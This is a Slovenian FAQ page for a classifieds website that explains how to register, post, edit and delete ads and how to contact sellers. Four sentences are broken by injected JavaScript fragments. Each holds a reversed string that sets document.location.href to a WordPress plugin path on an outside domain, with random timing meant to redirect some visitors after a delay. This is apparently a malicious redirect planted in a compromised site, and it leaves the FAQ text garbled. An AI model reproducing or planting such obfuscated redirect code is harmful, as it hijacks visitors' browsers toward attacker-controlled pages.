Kako se registrirati?
Kako objaviti oglas?
Kako urediti oglas?
Koliko časa bo moj oglas objavljen?
Kako izbrisati oglas?
Kako kontaktirati prodajalca?
Ali je registracija in objava oglasa plačljiva?
V katero regijo spadam?


Kako se registrirati?

V zgornjem desnem kotu kliknete na “Registracija”. Odpre se vam stran kjer izpolnete vse obvezne podatke označene z zvezdico (*) in kliknete na gumb “Registracija”. Na elektronski naslov vam bodo poslani vsi vaši podatki za prijavo v vaš račun.


Kako objaviti oglas?

Po uspešni registraciji se prijavite v vaš račun s klikom na “Prijava”. Poiščete povezavo “Oddaj oglas” na katero tudi kliknete. Odpre se vam stran za oddajo oglasa. Vnesite vse obvezne podatke o poslu/predmetu prodaje, ki so označeni z zvezdico (*). Če ne želite javno objaviti kontaktne podatke kot je Telefon ali Enaslov pustite polja prazna, saj je pri oglasu kontaktni obrazec preko katerega vas bodo uporabniki lahko kontaktirali. Če trenutno ne želite objaviti oglas lahko spodaj kliknete na “Shrani osnutek” za shranitev vseh izpolnjenih podatkov. Za takojšno objavo pa kliknete na gumb “Objavi oglas”. Vaš oglas bo nemudoma javno objavljen v izbrani kategoriji in regiji.

Če se ne želite registrirati vendar vseeno želite oddati oglas pošljite podatke na info@posel.net in posel bomo objavili namestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to vas.


Kako urediti oglas?

V “Mojem račun” kliknete na “Uredi oglase” in pri izbranem oglasu kliknete gumb “Uredi”. Pri urejanju lahko popravljate vsa polja in slike kot tudi prodajno ceno. Po končanem urejanju spodaj kliknete gumb “Shrani”.


Koliko časa bo moj oglas objavljen?

Po uspešni oddaji oglasa bo vaš oglas na voljo 365 dni  od datuma objave v izbrani kategoriji in regiji. Po tem času ga lahko brezplačno podaljšate.


Kako izbrisati oglas?

Če želite oglas pred iztekom objave izbrisati kliknete na “Moj račun” in natoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to “Uredi oglase”. Pri izbranem oglasu natoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to kliknete gumb “Izbriši”. Oglas bo nemudoma izbrisan in ne bo več viden uporabnikom.

Če smo oglas objavili namestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to vas in nimate uporabniškega računa nam pišite na info@posel.net z naslovom oglasa katerega želite izbrisati.


Kako kontaktirati prodajalca?

Če pri oglasu ni javno objavljena telefonska številka ali elektronski naslov prodajalca je pri vsakem oglasu kontaktni obrazec pod rubriko “Kontakt” v katerega vpišete vaše podatke ter sporočilo in kliknete na gumb “Pošlji”. Prodajalec bo vaše sporočilo prejel na elektronski naslov.

Če je elektronski naslov viden kot zvezdice (***), je potrebna prijava za ogled enaslova.


Ali je registracija in objava oglasa plačljiva?

Registracija in objava oglasov na www.posel.net je BREZPLAČNA in neomejena.


V katero regijo spadam?

 

Regije Slovenije